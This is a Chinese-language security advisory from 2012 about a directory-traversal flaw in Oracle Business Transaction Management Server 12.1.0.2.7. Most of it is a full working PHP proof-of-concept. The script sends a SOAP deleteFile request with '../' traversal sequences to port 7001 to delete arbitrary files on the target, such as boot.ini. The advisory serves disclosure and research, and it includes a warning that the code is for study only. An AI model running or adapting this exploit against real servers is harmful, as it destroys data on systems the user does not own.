发布日期：2012-08-07
更新日期：2012-08-09

受影响系统：

Oracle Business Transaction Management Server 12.1.0.2.7

描述：

---

BUGTRAQ  ID: 54870

Oracle Business Transaction Management (BTM)提供了分布式复合应用上的端到端性能监控并跟踪业务往来。

Oracle Business Transaction Management (BTM) 12.1.0.2.7在实现上存在安全漏洞，可允许攻击者通过目录遍历字符串删除受影响计算机上的任意文件。

<*来源：rgod （rgod@autistici.org）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

rgod （rgod@autistici.org）提供了如下测试方法：


<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion poc

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:
C:\php>php 9sg_ora2.php 192.168.2.101 boot.ini

C:\php>php 9sg_ora2.php 192.168.2.101 windows\system32\win.ini

rgod
*/
    error_reporting(E_ALL ^ E_NOTICE);    
    set_time_limit(0);
    
    $err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extesion loaded!";

    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
    
    function syntax() {
       print("usage: php 9sg_ora2.php [ip_address] [file_to_delete]\r\n" );
       die();
    }
    
    $argv[2] ? print("[*] Attacking...\n") :
    syntax();
    
    if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
             print("[*] curl loaded\n");
        } else {
            !dl("php_curl.so") ? die($err[1]) :
             print("[*] curl loaded\n");
        }
    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post == 1) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        if ($is_post == 2) {
            curl_setopt($ch, CURLOPT_PUT, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "Content-Type: text/xml;charset=UTF-8",
            "SOAPAction: \"http://soa.amberpoint.com/deleteFile\"",
                      

        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
        //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
        
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            //die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
          $host = $argv[1];
          $port = 7001;
          $file = $argv[2];

$soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:deleteFileRequest>
         <int:deleteFile handle="../../../../../../../../../../../../../../../../../../'.$file.'">
            <typ:DeleteFileRequestVersion>
            </typ:DeleteFileRequestVersion>
         </int:deleteFile>
      </int:deleteFileRequest>
   </soapenv:Body>
</soapenv:Envelope>';

$url = "http://$host:$port/btmui/soa/flash_svc/";
$out = _s($url, 1, "", $soap);
print($out."\n");
?>

建议：

---

厂商补丁：

Oracle
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.oracle.com/technetwork/topics/security/

浏览次数：2300
严重程度：0（网友投票）